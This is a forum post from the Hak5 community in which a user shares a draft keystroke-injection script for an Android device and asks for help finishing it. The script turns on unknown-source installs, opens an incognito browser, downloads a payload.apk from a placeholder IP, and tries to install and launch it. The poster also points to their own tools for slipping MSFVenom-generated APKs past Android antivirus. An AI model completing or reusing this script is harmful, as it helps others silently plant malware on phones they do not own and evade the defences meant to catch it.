n33dsh3llz Posted February 25, 2017 Share Posted February 25, 2017 Hello Hak5 Community, Trying to figure out how to download a .apk file, then execute it. I know how to download it, which may be enough. Ideally, the whole process could be 100% automated. Maybe I could just sleep the script giving the user time to launch manually if there is no hotkeys. I tried opening the downloads inside the browser, but couldn't find a way to select the rows of downloaded files (maybe a security feature). Also, when bringing down the main bar and going to the downloaded file, then launching, it never opened the app other than seeing the AV scan take place. Note: WINDOWS+N brings down top slider bar & F10 opens downloads in Chrome.. documents said CNTL+J opened downloads, but it wasn't working for me. Can't figure out a way to open the downloaded .apk file. Here is what I have so far. Keep in mind delays have not been put in yet and this is merely a run-down through using a keyboard: #Allow unknown sources ESCAPE #(x whatever for main screen) WINDOWS+N UP ENTER DOWN ARROW x 6 ENTER DOWN ARROW x 7 ENTER RIGHT ARROW ENTER ESCAPE #(x whatever to get to main screen) #Begin the download and install of the payload WINDOWS+B #Brings up the browser CNTL+SHIFT+N #Open incognito window (if not chrome, shouldnt do anything) CNTL+L #Access the URL bar String http://x.x.x.x:xxxx/payload.apk #types in the file to download ENTER ** FIGURE OUT WAY TO LAUNCH IT ** TAB TAB #Places you at INSTALL ENTER SLEEP X #Give to install TAB TAB ENTER #Launch Recent scripts I wrote to bypass Android AV: https://github.com/jbreed/apkwash https://github.com/jbreed/apkinjector For this attack, apkwash would be perfect as it would simply mask the small .apk file generated by MSFVenom. Smaller=faster downloading. Maybe a twin-duck for this would work better to install from local media. Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.